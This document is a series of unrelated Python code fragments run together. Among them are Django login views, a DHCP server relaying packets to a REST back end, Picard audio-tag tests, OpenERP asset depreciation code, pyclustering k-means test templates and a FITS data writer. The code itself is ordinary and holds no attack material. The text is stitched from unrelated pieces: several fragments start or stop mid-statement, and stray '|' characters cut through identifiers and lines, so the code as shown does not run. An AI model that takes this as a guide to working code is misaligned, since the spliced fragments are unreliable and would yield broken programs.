latest = result['sha'].strip()
self.logger.debug('Branch: %s' % self.current_branch_name())
self.logger.debug('Latest sha: %s' % latest)
self.latestHash = latest
return latest
except Exception as e:
self.logger.error("Failed to get last commit from github")
return False
def current(self):
""" Get hash of current Git commit """
self.logger.debug('Getting current version.')
output = self.git_exec(self.git, 'rev-parse HEAD')
self.logger.debug('Current version: ' + output)
if not output:
self.logger.error('Couldnt determine installed branch.')
return False
if re.match('^[a-z0-9]+$', output):
return output
def branches(self):
cbn = self.current_branch_name()
d = {
"branch": cbn,
"branches": []
}
if self.current is not False:
d["verified"] = True
else:
# If its false, default to master branch
d["branch"] = htpc.settings.get('branch', 'master2')
branches = self.git_exec(self.git, 'ls-remote --heads https://github.com/Hellowlol/HTPC-Manager.git')
if branches:
# find all branches except the current branch.
d["branches"] = [b for b in re.findall('\S+ |
from django.conf import settings
from django.contrib import auth
from django.contrib.auth.forms import AuthenticationForm
from django.utils.decorators import method_decorator
from django.utils.http import is_safe_url
from django.views.decorators.debug import sensitive_post_parameters
from django.views import generic
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect
class LoginView(generic.FormView):
success_url = settings.LOGIN_REDIRECT_URL
form_class = AuthenticationForm
redirect_param = getattr(settings, 'REDIRECT_FIELD_NAME', 'next')
template_name = 'accounts/login.html'
@method_decorator(sensitive_post_parameters('password'))
@method_decorator(csrf_protect)
@method_decorator(never_cache)
def dispatch(self, request, *args, **kwargs):
request.session.set_test_cookie()
return super(LoginView, self).dispatch(request, *args, **kwargs)
def form_valid(self, form):
auth.login(self.request, form.get_user())
if self.request.session.test_cookie_worked():
self.request.session.delete_test_cookie()
return super(LoginView, self).form_valid(form)
def form_invalid(self, form):
return self.render_to_response(self.get_context_data(form=form))
def get_success_url(self):
redirect_to = self.request.GET.get(self.redirect_param)
if not is_safe_url(url=redirect_to, host=self.request.get_host()):
redirect_to = self.success_url
| return redirect_to
class LogoutView(generic.RedirectView) | :
permanent = False
pattern_name = 'main:landing'
def get(self, request, *args, **kwargs):
auth.logout(request)
return super(LogoutView, self).get(request, *args, **kwargs)
class ProfileView(generic.TemplateView):
template_name = 'accounts/profile_detail.html'
|
packet was received.
"""
logging.info('recieved DHCPRELEASE from: %s:%s',
source_address.ip, source_address.port)
logging.debug('\n%s\n', packet)
self._get_client_options(
'DHCP_RELEASE', self._get_packet_info(packet))
def _handleDHCPRequest(self, packet, source_address, port):
"""Processes a REQUEST packet.
Override from DHCPServer.
Send the packet's info to the AA server, get the response,
and send it back to the client.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to be processed.
source_add | ress (dhcp.Address):
The address from which the request was received.
port (int):
The port on which the packet was received.
| """
logging.info('recieved DHCPREQUEST from: %s:%s',
source_address.ip, source_address.port)
logging.debug('\n%s\n', packet)
[msg_type, options] = self._get_client_options(
'DHCP_REQUEST', self._get_packet_info(packet))
self._send_dhcp_msg(packet, msg_type, options, source_address, port)
def get_next_dhcp_packet(self, timeout=60, packet_buffer=2048):
"""Make the _getNextDHCPPacket method public."""
return self._getNextDHCPPacket(timeout, packet_buffer)
def _send_dhcp_msg(
self, packet, msg_type, options, source_address, port
):
"""Send the DHCP packet to the client.
Set the options of the DHCP packet, and send it to the client.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to send to the client.
msg_type (str):
The message type of the DHCP packet.
options (dict):
The options of the DHCP packet.
source_address (dhcp.Address):
The address from which the request was received.
port (int):
The port on which the packet was received.
"""
if msg_type is None:
logging.warning('Ignore a packet: message type is None.')
return
for option, value in options.items():
packet.setOption(option, value)
# packet.setOption('server_identifier', self._server_address)
if msg_type == 'DHCP_OFFER':
packet.transformToDHCPOfferPacket()
elif msg_type == 'DHCP_ACK':
packet.transformToDHCPAckPacket()
elif msg_type == 'DHCP_NAK':
packet.transformToDHCPNakPacket()
else:
logging.warning('Incorrect message type: %s.', msg_type)
logging.warning('Packet will be ignored.')
return
logging.info('send %s to %s:%s',
msg_type, source_address.ip, port)
logging.debug('\n%s\n', packet)
self._sendDHCPPacket(packet, source_address, port)
@staticmethod
def _get_packet_info(packet):
"""Return a dict of the infomation of the DHCP packet.
Fetch the information from the DHCP packet, and return them
in dict type.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to be processed.
Returns:
dict: The information of the packet.
"""
info = {}
# fetch the information from these fields
for field_name in [
'op', 'htype', 'hlen', 'hops', 'xid', 'secs', 'flags',
'ciaddr', 'yiaddr', 'siaddr', 'giaddr', 'chaddr',
'sname', 'file'
]:
info[field_name] = packet.getOption(field_name)
# fetch the information from the "option" field
options = {}
packet.setSelectedOptions()
for option in packet.getSelectedOptions():
options[option] = packet.getOption(option)
info['options'] = options
return info
def _get_client_optionsT(self, dhcp_type, client_info): #pylint: disable=I,W,C
'''Get the fixed options of the client.
This method is for debugging.
Args:
dhcp_type (str): The DHCP type in DHCP_TYPE_NAMES.
client_info (dict): The info of the client from DHCP packet.
Returns: [res_msg_type, res_data]
res_msg_type (str): The message type that should send to client.
res_data (list): The options that should send to client (if needed).
'''
require_options = False
if dhcp_type == 'DHCP_DISCOVER':
require_options = True
elif dhcp_type == 'DHCP_REQUEST':
require_options = True
elif dhcp_type == 'DHCP_INFORM':
require_options = True
elif dhcp_type == 'DHCP_DECLINE':
require_options = False
elif dhcp_type == 'DHCP_RELEASE':
require_options = False
# elif dhcp_type == 'DHCP_LEASEQUERY':
# requireOptions = True
else:
logging.error('Incorrect dhcp_type from server: %s.', dhcp_type)
logging.error('Packet will be ignored.')
return [None, None]
res_msg_type = None
res_data = None
if require_options:
try:
res_msg_type = self._code_to_msg_type[dhcp_type][200]
except KeyError:
logging.error('Status code from server is not correct: ')
logging.error('Packet will be ignored.')
if res_msg_type is not None:
try:
res_data = {
'subnet_mask': '255.255.255.0',
'router': '192.168.1.1',
'domain_name_servers': '8.8.8.8',
'ip_address_lease_time': 3600,
'server_identifier': '127.0.0.1',
'yiaddr': '192.168.1.100'
}
except ValueError:
logging.error('Data sent from server is not correct.')
return [res_msg_type, res_data]
def _get_client_options(self, dhcp_type, client_info):
'''Get the options of the client from a RESTful server.
Args:
dhcp_type (str): The DHCP type in DHCP_TYPE_NAMES.
client_info (dict): The info of the client from DHCP packet.
Returns: [res_msg_type, res_data]
res_msg_type (str): The message type that should send to client.
res_data (list): The options that should send to client (if needed).
'''
# Send the information of the packet received from the client
# to the AA server, and get the response.
res = None
require_options = False
if dhcp_type == 'DHCP_DISCOVER':
logging.debug('Url: %s', self._aaserver_addr)
res = requests.post(self._aaserver_addr + '/discover',
json=client_info)
require_options = True
elif dhcp_type == 'DHCP_REQUEST':
res = requests.post(self._aaserver_addr + '/request',
json=client_info)
require_options = True
elif dhcp_type == 'DHCP_INFORM':
res = requests.post(self._aaserver_addr + '/inform',
json=client_info)
require_options = True
elif dhcp_type == 'DHCP_DECLINE':
res = requests.put(self._aaserver_addr + '/decline',
json=client_info)
require_options = False
elif dhcp_type == 'DHCP_RELEASE':
res = requests.put(self._aaserver_addr + '/release',
json=client_info)
require_options = False
# elif dhcp_type == 'DHCP_LEASEQUERY':
# res = requests.post(self._aaserver_addr + '/leasequery',
# json=client_info)
# r |
def find_number(x):
str_x = str(x)
if len(str_x) == 1:
raise Exception()
left_most = str_x[0]
try:
small_from_rest = find_number(int(str_x[1:]))
return int(left_most + str(small_from_rest))
except:
# min() will throw exception if parameter is empty list, meaning no digit is great | er than the left_most digit.
new_left_most = min([c for c in str_x[1:] if c > left_mos | t])
# assumption: no repeated digit
rest_of_digits = ''.join(sorted([c for c in str_x if c != new_left_most]))
y = new_left_most + rest_of_digits
return int(y)
print(find_number(5346)) |
# -*- coding: utf-8 -*-
#
# Picard, the next-generation MusicBrainz tagger
#
# Copyright (C) 2019-2020 Philipp Wolfer
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
from mutagen.asf import ASFByteArrayAttribute
from test.picardtestcase import (
PicardTestCase,
create_fake_png,
)
from picard.formats import (
asf,
ext_to_format,
)
from .common import (
CommonTests,
load_metadata,
load_raw,
save_metadata,
save_raw,
skipUnlessTestfile,
)
from .coverart import CommonCoverArtTests
# prevent unittest to run tests in those classes
class CommonAsfTests:
class AsfTestCase(CommonTests.TagFormatsTestCa | se):
def test_supports_tag(self):
fmt = ext_to_format(self.testfile_ext[1:])
self.assertTrue(fmt.supports_tag('copyright'))
self.assertTrue(fmt.supports_tag('compilation'))
self.assertTrue(fmt.supports_tag('bpm'))
self.assertTrue(fmt.supports_tag('djmixer'))
self.assertTrue(fmt.supports_tag('discnumber'))
self.assertTrue(fmt.supports_ | tag('lyrics:lead'))
self.assertTrue(fmt.supports_tag('~length'))
for tag in self.replaygain_tags.keys():
self.assertTrue(fmt.supports_tag(tag))
@skipUnlessTestfile
def test_ci_tags_preserve_case(self):
# Ensure values are not duplicated on repeated save and are saved
# case preserving.
tags = {
'Replaygain_Album_Peak': '-6.48 dB'
}
save_raw(self.filename, tags)
loaded_metadata = load_metadata(self.filename)
loaded_metadata['replaygain_album_peak'] = '1.0'
save_metadata(self.filename, loaded_metadata)
raw_metadata = load_raw(self.filename)
self.assertIn('Replaygain_Album_Peak', raw_metadata)
self.assertEqual(raw_metadata['Replaygain_Album_Peak'][0], loaded_metadata['replaygain_album_peak'])
self.assertEqual(1, len(raw_metadata['Replaygain_Album_Peak']))
self.assertNotIn('REPLAYGAIN_ALBUM_PEAK', raw_metadata)
def _test_invalid_picture(self, invalid_picture_data):
png_data = create_fake_png(b'x')
tags = {
'WM/Picture': [
ASFByteArrayAttribute(invalid_picture_data),
ASFByteArrayAttribute(
asf.pack_image("image/png", png_data)
)
]
}
save_raw(self.filename, tags)
metadata = load_metadata(self.filename)
self.assertEqual(1, len(metadata.images))
self.assertEqual(png_data, metadata.images[0].data)
@skipUnlessTestfile
def test_ignore_invalid_wm_picture(self):
# A picture that cannot be unpacked
self._test_invalid_picture(b'notapicture')
class ASFTest(CommonAsfTests.AsfTestCase):
testfile = 'test.asf'
supports_ratings = True
expected_info = {
'length': 92,
'~channels': '2',
'~sample_rate': '44100',
'~bitrate': '128.0',
}
class WMATest(CommonAsfTests.AsfTestCase):
testfile = 'test.wma'
supports_ratings = True
expected_info = {
'length': 139,
'~channels': '2',
'~sample_rate': '44100',
'~bitrate': '64.0',
}
unexpected_info = ['~video']
class WMVTest(CommonAsfTests.AsfTestCase):
testfile = 'test.wmv'
supports_ratings = True
expected_info = {
'length': 565,
'~channels': '2',
'~sample_rate': '44100',
'~bitrate': '128.0',
'~video': '1',
}
class AsfUtilTest(PicardTestCase):
test_cases = [
# Empty MIME, description and data
(('', b'', 2, ''), b'\x02\x00\x00\x00\x00\x00\x00\x00\x00'),
# MIME, description set, 1 byte data
(('M', b'x', 2, 'D'), b'\x02\x01\x00\x00\x00M\x00\x00\x00D\x00\x00\x00x'),
# Empty MIME and description, 3 byte data
(('', b'abc', 0, ''), b'\x00\x03\x00\x00\x00\x00\x00\x00\x00abc'),
]
def test_pack_and_unpack_image(self):
mime = 'image/png'
image_data = create_fake_png(b'x')
image_type = 4
description = 'testing'
tag_data = asf.pack_image(mime, image_data, image_type, description)
expected_length = 5 + 2 * len(mime) + 2 + 2 * len(description) + 2 + len(image_data)
self.assertEqual(tag_data[0], image_type)
self.assertEqual(len(tag_data), expected_length)
self.assertEqual(image_data, tag_data[-len(image_data):])
unpacked = asf.unpack_image(tag_data)
self.assertEqual(mime, unpacked[0])
self.assertEqual(image_data, unpacked[1])
self.assertEqual(image_type, unpacked[2])
self.assertEqual(description, unpacked[3])
def test_pack_image(self):
for args, expected in self.test_cases:
self.assertEqual(expected, asf.pack_image(*args))
def test_unpack_image(self):
for expected, packed in self.test_cases:
self.assertEqual(expected, asf.unpack_image(packed))
def test_unpack_image_value_errors(self):
self.assertRaisesRegex(ValueError, "unpack_from requires a buffer of at least 5 bytes",
asf.unpack_image, b'')
self.assertRaisesRegex(ValueError, "unpack_from requires a buffer of at least 5 bytes",
asf.unpack_image, b'\x02\x01\x00\x00')
self.assertRaisesRegex(ValueError, "mime: missing data",
asf.unpack_image, b'\x00\x00\x00\x00\x00')
self.assertRaisesRegex(ValueError, "mime: missing data",
asf.unpack_image, b'\x04\x19\x00\x00\x00a\x00')
self.assertRaisesRegex(ValueError, "desc: missing data",
asf.unpack_image, b'\x04\x19\x00\x00\x00a\x00\x00\x00a\x00')
self.assertRaisesRegex(ValueError, "image data size mismatch",
asf.unpack_image, b'\x04\x19\x00\x00\x00a\x00\x00\x00a\x00\x00\x00x')
class AsfCoverArtTest(CommonCoverArtTests.CoverArtTestCase):
testfile = 'test.asf'
class WmaCoverArtTest(CommonCoverArtTests.CoverArtTestCase):
testfile = 'test.wma'
|
_depreciation_line_ids = depreciation_lin_obj.search(cr, uid, [('asset_id', '=', asset.id), ('move_id', '=', False)])
if old_depreciation_line_ids:
depreciation_lin_obj.unlink(cr, uid, old_depreciation_line_ids, context=context)
amount_to_depr = residual_amount = asset.value_residual
if asset.prorata:
depreciation_date = datetime.strptime(self._get_last_depreciation_date(cr, uid, [asset.id], context)[asset.id], '%Y-%m-%d')
else:
# depreciation_date = 1st January of purchase year
purchase_date = datetime.strptime(asset.purchase_date, '%Y-%m-%d')
#if we already have some previous validated entries, starting date isn't 1st January but last entry + method period
if (len(posted_depreciation_line_ids)>0):
last_depreciation_date = datetime.strptime(depreciation_lin_obj.browse(cr,uid,posted_depreciation_line_ids[0],context=context).depreciation_date, '%Y-%m-%d')
depreciation_date = (last_depreciation_date+relativedelta(months=+asset.method_period))
else:
depreciation_date = datetime(purchase_date.year, 1, 1)
day = depreciation_date.day
month = depreciation_date.month
year = depreciation_date.year
total_days = (year % 4) and 365 or 366
undone_dotation_number = self._compute_board_undone_dotation_nb(cr, uid, asset, depreciation_date, total_days, context=context)
for x in range(len(posted_depreciation_line_ids), undone_dotation_number):
i = x + 1
amount = self._compute_board_amount(cr, uid, asset, i, residual_amount, amount_to_depr, undone_dotation_number, posted_depreciation_line_ids, total_days, depreciation_date, context=context)
company_currency = asset.company_id.currency_id.id
current_currency = asset.currency_id.id
# compute amount into company currency
amount = currency_obj.compute(cr, uid, current_currency, company_currency, amount, context=context)
residual_amount -= amount
vals = {
'amount': amount,
'asset_id': asset.id,
'sequence': i,
'name': str(asset.id) +'/' + str(i),
'remaining_value': residual_amount,
'depreciated_value': (asset.purchase_value - asset.salvage_value) - (residual_amount + amount),
'depreciation_date': depreciation_date.strftime('%Y-%m-%d'),
}
depreciation_lin_obj.create(cr, uid, vals, context=context)
# Considering Depr. Period as months
depreciation_date = (datetime(year, month, day) + relativedelta(months=+asset.method_period))
day = depreciation_date.day
month = depreciation_date.month
year = depreciation_date.year
return True
def validate(self, cr, uid, ids, context=None):
if context is None:
context = {}
return self.write(cr, uid, ids, {
'state':'open'
}, context)
def set_to_close(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'close'}, context=context)
def set_to_draft(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'draft'}, context=context)
def _amount_residual(self, cr, uid, ids, name, args, context=None):
cr.execute("""SELECT
l.asset_id as id, SUM(abs(l.debit-l.credit)) AS amount
FROM
account_move_line l
WHERE
l.asset_id IN %s GROUP BY l.asset_id """, (tuple(ids),))
res=dict(cr.fetchall())
for asset in self.browse(cr, uid, ids, context):
res[asset.id] = asset.purchase_value - res.get(asset.id, 0.0) - asset.salvage_value
for id in ids:
res.setdefault(id, 0.0)
return res
def onchange_company_id(self, cr, uid, ids, company_id=False, context=None):
val = {}
if company_id:
company = self.pool.get('res.company').browse(cr, uid, company_id, context=context)
if company.currency_id.company_id and company.currency_id.company_id.id != company_id:
val['currency_id'] = False
else:
| val['currency_id'] = company.currency_id.id
return {'value': val}
def onchange_purchase_salvage_value(self, cr, uid, ids, purchase_value, salvage_value, context=None):
val = {}
for asset in self.browse(cr, uid, ids, context=context):
if purchase_value:
val['value_residual'] = | purchase_value - salvage_value
if salvage_value:
val['value_residual'] = purchase_value - salvage_value
return {'value': val}
_columns = {
'account_move_line_ids': fields.one2many('account.move.line', 'asset_id', 'Entries', readonly=True, states={'draft':[('readonly',False)]}),
'name': fields.char('Asset Name', size=64, required=True, readonly=True, states={'draft':[('readonly',False)]}),
'code': fields.char('Reference', size=32, readonly=True, states={'draft':[('readonly',False)]}),
'purchase_value': fields.float('Gross Value', required=True, readonly=True, states={'draft':[('readonly',False)]}),
'currency_id': fields.many2one('res.currency','Currency',required=True, readonly=True, states={'draft':[('readonly',False)]}),
'company_id': fields.many2one('res.company', 'Company', required=True, readonly=True, states={'draft':[('readonly',False)]}),
'note': fields.text('Note'),
'category_id': fields.many2one('account.asset.category', 'Asset Category', required=True, change_default=True, readonly=True, states={'draft':[('readonly',False)]}),
'parent_id': fields.many2one('account.asset.asset', 'Parent Asset', readonly=True, states={'draft':[('readonly',False)]}),
'child_ids': fields.one2many('account.asset.asset', 'parent_id', 'Children Assets'),
'purchase_date': fields.date('Purchase Date', required=True, readonly=True, states={'draft':[('readonly',False)]}),
'state': fields.selection([('draft','Draft'),('open','Running'),('close','Close')], 'Status', required=True,
help="When an asset is created, the status is 'Draft'.\n" \
"If the asset is confirmed, the status goes in 'Running' and the depreciation lines can be posted in the accounting.\n" \
"You can manually close an asset when the depreciation is over. If the last line of depreciation is posted, the asset automatically goes in that status."),
'active': fields.boolean('Active'),
'partner_id': fields.many2one('res.partner', 'Partner', readonly=True, states={'draft':[('readonly',False)]}),
'method': fields.selection([('linear','Linear'),('degressive','Degressive')], 'Computation Method', required=True, readonly=True, states={'draft':[('readonly',False)]}, help="Choose the method to use to compute the amount of depreciation lines.\n"\
" * Linear: Calculated on basis of: Gross Value / Number of Depreciations\n" \
" * Degressive: Calculated on basis of: Residual Value * Degressive Factor"),
'method_number': fields.integer('Number of Depreciations', readonly=True, states={'draft':[('readonly',False)]}, help="The number of depreciations needed to depreciate your asset"),
'method_period': fields.integer('Number of Months in a Period', required=True, readonly=True, states={'draft':[('readonly',False)]}, help="The amount of time between two depreciations, in months"),
'method_end': fields.date('Ending Date', readonly=True, states={'draft':[('readonly',False)]}),
'method_progress_factor': fields.float('Degressive Factor', readonly=True, states={'draft':[('readonly',False)]}),
'value_resid |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from gaegraph.business_base import NodeSearch, DeleteNode
from classificacaodtm_app.commands import ListClassificacaodtmCommand, SaveClassificacaodtmCommand, UpdateClassificacaodtmCommand, \
ClassificacaodtmPublicForm, ClassificacaodtmDetailForm, ClassificacaodtmShortForm
def save_classificacaodtm_cmd(**classificacaodtm_properties):
"""
Command to save Classificacaodtm entity
:param classificacaodtm_properties: a dict of properties to save on model
:return: a Command that save Classificacaodtm, validating and localizing properties received as strings
"""
return SaveClassificacaodtmCommand(**classificacaodtm_properties)
def update_classificacaodtm_cmd(classificacaodtm_id, **classificacaodtm_properties):
"""
Command to update Classificacaodtm entity with id equals 'classificacaodtm_id'
:param classificacaodtm_properties: a dict of properties to update model
:return: a Command that update Classificacaodtm, validating and localizing properties received as strings
"""
return Updat | eClassificacaodtmCommand(classificacaodtm_id, **classificacaodtm_properties)
def list_classificacaodtms_cmd():
"""
Command to list Classificacaodtm entities ordered by their creation dates
:return: a Command proceed the db operations when executed
"""
return ListClassificacaodtmCommand()
def classifi | cacaodtm_detail_form(**kwargs):
"""
Function to get Classificacaodtm's detail form.
:param kwargs: form properties
:return: Form
"""
return ClassificacaodtmDetailForm(**kwargs)
def classificacaodtm_short_form(**kwargs):
"""
Function to get Classificacaodtm's short form. just a subset of classificacaodtm's properties
:param kwargs: form properties
:return: Form
"""
return ClassificacaodtmShortForm(**kwargs)
def classificacaodtm_public_form(**kwargs):
"""
Function to get Classificacaodtm'spublic form. just a subset of classificacaodtm's properties
:param kwargs: form properties
:return: Form
"""
return ClassificacaodtmPublicForm(**kwargs)
def get_classificacaodtm_cmd(classificacaodtm_id):
"""
Find classificacaodtm by her id
:param classificacaodtm_id: the classificacaodtm id
:return: Command
"""
return NodeSearch(classificacaodtm_id)
def delete_classificacaodtm_cmd(classificacaodtm_id):
"""
Construct a command to delete a Classificacaodtm
:param classificacaodtm_id: classificacaodtm's id
:return: Command
"""
return DeleteNode(classificacaodtm_id)
|
"""!
@brief Test templates for K-Means clustering module.
@authors Andrei Novikov (pyclustering@yandex.ru)
@date 2014-2020
@copyright BSD-3-Clause
"""
from pyclustering.tests.assertion import assertion
from pyclustering.cluster.encoder import type_encoding, cluster_encoder
from pyclustering.cluster.kmeans import kmeans, kmeans_observer, kmeans_visualizer
from pyclustering.utils import read_sample
from pyclustering.utils.metric import distance_metric, type_metric
from random import random
import numpy
class KmeansTestTemplates:
@staticmethod
def templateLengthProcessData(data, start_centers, expected_cluster_length, ccore, **kwargs):
if isinstance(data, str):
sample = read_sample(data)
else:
sample = data
metric = kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN_SQUARE))
itermax = kwargs.get('itermax', 200)
kmeans_instance = kmeans(sample, start_centers, 0.001, ccore, metric=metric, itermax=itermax)
kmeans_instance.process()
clusters = kmeans_instance.get_clusters()
centers = kmeans_instance.get_centers()
wce = kmeans_instance.get_total_wce()
if itermax == 0:
assertion.eq(start_centers, centers)
assertion.eq([], clusters)
assertion.eq(0.0, wce)
return
expected_wce = 0.0
for index_cluster in range(len(clusters)):
for index_point in clusters[index_cluster]:
expected_wce += metric(sample[index_point], centers[index_cluster])
assertion.eq(expected_wce, wce)
obtained_cluster_sizes = [len(cluster) for cluster in clusters]
assertion.eq(len(sample), sum(obtained_cluster_sizes))
assertion.eq(len(clusters), len(centers))
for cent | er in centers:
assertion.eq(len(sample[0]), len(center))
if expected_cluster_length is not None:
obtained_cluster_sizes.sort()
expected_cluster_length.sort()
assertion.eq(obtained_cluster_sizes, expected_cluster_length)
@staticmethod
def templatePredict(path_to_file, initial_centers, points, expected_closest_clusters, ccore, **kwargs):
| sample = read_sample(path_to_file)
metric = kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN_SQUARE))
itermax = kwargs.get('itermax', 200)
kmeans_instance = kmeans(sample, initial_centers, 0.001, ccore, metric=metric, itermax=itermax)
kmeans_instance.process()
closest_clusters = kmeans_instance.predict(points)
assertion.eq(len(expected_closest_clusters), len(closest_clusters))
assertion.true(numpy.array_equal(numpy.array(expected_closest_clusters), closest_clusters))
@staticmethod
def templateClusterAllocationOneDimensionData(ccore_flag):
input_data = [ [random()] for _ in range(10) ] + [ [random() + 3] for _ in range(10) ] + [ [random() + 5] for _ in range(10) ] + [ [random() + 8] for _ in range(10) ]
kmeans_instance = kmeans(input_data, [ [0.0], [3.0], [5.0], [8.0] ], 0.025, ccore_flag)
kmeans_instance.process()
clusters = kmeans_instance.get_clusters()
assertion.eq(4, len(clusters))
for cluster in clusters:
assertion.eq(10, len(cluster))
@staticmethod
def templateEncoderProcedures(filename, initial_centers, number_clusters, ccore_flag):
sample = read_sample(filename)
kmeans_instance = kmeans(sample, initial_centers, 0.025, ccore_flag)
kmeans_instance.process()
clusters = kmeans_instance.get_clusters()
encoding = kmeans_instance.get_cluster_encoding()
encoder = cluster_encoder(encoding, clusters, sample)
encoder.set_encoding(type_encoding.CLUSTER_INDEX_LABELING)
encoder.set_encoding(type_encoding.CLUSTER_OBJECT_LIST_SEPARATION)
encoder.set_encoding(type_encoding.CLUSTER_INDEX_LIST_SEPARATION)
assertion.eq(number_clusters, len(clusters))
@staticmethod
def templateCollectEvolution(filename, initial_centers, number_clusters, ccore_flag):
sample = read_sample(filename)
observer = kmeans_observer()
kmeans_instance = kmeans(sample, initial_centers, 0.025, ccore_flag, observer=observer)
kmeans_instance.process()
assertion.le(1, len(observer))
for i in range(len(observer)):
assertion.le(1, len(observer.get_centers(i)))
for center in observer.get_centers(i):
assertion.eq(len(sample[0]), len(center))
assertion.le(1, len(observer.get_clusters(i)))
@staticmethod
def templateShowClusteringResultNoFailure(filename, initial_centers, ccore_flag):
sample = read_sample(filename)
kmeans_instance = kmeans(sample, initial_centers, 0.025, ccore_flag)
kmeans_instance.process()
clusters = kmeans_instance.get_clusters()
centers = kmeans_instance.get_centers()
figure = kmeans_visualizer.show_clusters(sample, clusters, centers, initial_centers)
kmeans_visualizer.close(figure)
@staticmethod
def templateAnimateClusteringResultNoFailure(filename, initial_centers, ccore_flag):
sample = read_sample(filename)
observer = kmeans_observer()
kmeans_instance = kmeans(sample, initial_centers, 0.025, ccore_flag, observer=observer)
kmeans_instance.process()
kmeans_visualizer.animate_cluster_allocation(sample, observer)
|
import numpy as np
from shesha.util.writers.common import dm
from shesha.util.writers.common import wfs
from shesha.util.writers.common import imat
from astropy.io import fits
def wfs_to_fits_hdu(sup, wfs_id):
"""Return a fits Header Data Unit (HDU) representation of a single WFS
Args:
sup : (compasSSupervisor) : supervisor
wfs_id : (int) : index of the WFS in the supervisor
Returns:
hdu : (ImageHDU) : fits representation of the WFS
"""
hdu_name = "WFS" + str(wfs_id)
X,Y = wfs.get_subap_pos_meter(sup, wfs_id)
valid_subap = np.array([X,Y],dtype=np.float64)
hdu = fits.ImageHDU( valid_subap, name=hdu_name)
hdu.header["NSSP"] = sup.config.p_wfss[wfs_id].get_nxsub()
hdu.header["SSPSIZE"] = sup.config.p_wfss[wfs_id].get_subapd()
return hdu
def dm_to_fits_hdu(sup, dm_id):
"""Return a fits Header Data Unit (HDU) representation of a single DM
Args:
sup : (compasSSupervisor) : supervisor
wfs_id : (int) : index of the DM in the supervisor
Returns:
hdu : (ImageHDU) : fits representation of the DM
"""
hdu_name = "DM" + str(dm_id)
X,Y = dm.get_actu_pos_meter(sup, dm_id)
valid_subap = np.array([X,Y],dtype=np.float64)
hdu = fits.ImageHDU( valid_subap, name=hdu_name)
hdu.header["NACTU"] = sup.config.p_dms[dm_id].get_nact()
hdu.header["PITCH"] = sup.config.p_dms[dm_id].get_pitch()
hdu.header["COUPLING"] = sup.config.p_dms[dm_id].get_coupling()
hdu.header["ALT"] = sup.config.p_dms[dm_id].get_alt()
return hdu
def dm_influ_to_fits_hdu(sup, dm_id, *, influ_index=-1):
"""Return a fits Header Data Unit (HDU) holding the influence functions of a specific DM
Args:
sup : (compasSSupervisor) : supervisor
wfs_id : (int) : index of the DM in the supervisor
Kwargs:
influ_index : (int) : (optional) default -1, index of the actuator to get the influence function from. -1 : get all influence functions
Returns:
hdu : (ImageHDU) : hdu holding the DM influence functions
"""
hdu_name = "INFLU_DM" + str(dm_id)
if influ_index < 0 :
influ_fct = sup.config.p_dms[dm_id].get_influ().astype(np.float64)
else :
influ_fct = sup.config.p_dms[dm_id].get_influ()[:,:,influ_index].astype(np.float64)
hdu = fits.ImageHDU( influ_fct, name=hdu_name)
return hdu
def write_data(file_name, sup, *, wfss_indices=None, dms_indices=None,
controller_id=0, influ=0, compose_type="controller"):
""" Write data for yao compatibility
write into a single fits:
* number of valide subapertures
* number of actuators
* subapertures position (2-dim array x,y) in meters centered
* actuator position (2-dim array x,y) in pixels starting from 0
* interaction matrix (2*nSubap , nactu)
* command matrix (nacy , 2*nSubap)
Args:
file_name : (str) : data file name
sup : (compasSSupervisor) : supervisor
Kargs:
wfss_indices : (list[int]) : optional, default all, list of the wfs indices to include
dms_indices : (list[in | t]) : optional, default all, list of the DM indices to include
| controller_id : (int) : optional, index of the controller passed to yao
influ : (int) : optional, actuator index for the influence function
compose_type : (str) : optional, possibility to specify split tomography case ("controller" or "splitTomo")
"""
print("writing data to" + file_name)
hdul=fits.HDUList([])
# setting list of wfs and dm
conf = sup.config
if(wfss_indices is None):
wfss_indices = np.arange(len(conf.p_wfss))
if(dms_indices is None):
dms_indices = []
for i in range(len(conf.p_dms)):
if( conf.p_dms[i].type != "tt"):
dms_indices.append(i)
#cout the number of lgs
n_lgs = 0
for i in wfss_indices :
if(conf.p_wfss[i].get_gsalt() > 0):
n_lgs += 1
#primary hdu contains only keywords for sanity check
hdu = fits.PrimaryHDU(np.zeros(1,dtype=np.int32))
hdu.header["DIAM"] = conf.p_tel.get_diam()
hdu.header["COBS"] = conf.p_tel.get_cobs()
hdu.header["NLGS"] = n_lgs
hdu.header["NNGS"] = len(wfss_indices) - n_lgs
hdu.header["NDM" ] = len(dms_indices)
hdu.header["PIXSIZE"] = conf.p_geom.get_pixsize()
#add primary hdu to list
hdul.append(hdu)
# add wfss
for i in wfss_indices:
hdul.append( wfs_to_fits_hdu(sup, i))
# add dm
for i in dms_indices:
hdul.append(dm_to_fits_hdu(sup, i))
hdul.append(dm_influ_to_fits_hdu(sup, i, influ_index = influ))
if(controller_id > -1):
# IMAT
interaction_mat=imat.compose_imat(sup, compose_type=compose_type,
controller_id=controller_id)
hdu_imat=fits.ImageHDU(interaction_mat,name="IMAT")
# CMAT
hdu_cmat=fits.ImageHDU(sup.rtc.get_command_matrix(controller_id),
name="CMAT")
print("\t* number of subaperture per WFS")
print("\t* subapertures position")
print("\t* number of actuator per DM")
print("\t* actuators position")
print("\t* Imat")
print("\t* Cmat")
hdul.writeto(file_name, overwrite=1) |
"""
Compute WordVectors using Yelp Data
"""
from gensim.models.word2vec import Word2Vec
from util.language import detect_language, tokenize_text
from data_handling import get_reviews_data |
# Set to true for zero in in English reviews. Makes the process much slower
FILTER_ENGLISH = True
# Name for output w2v model file
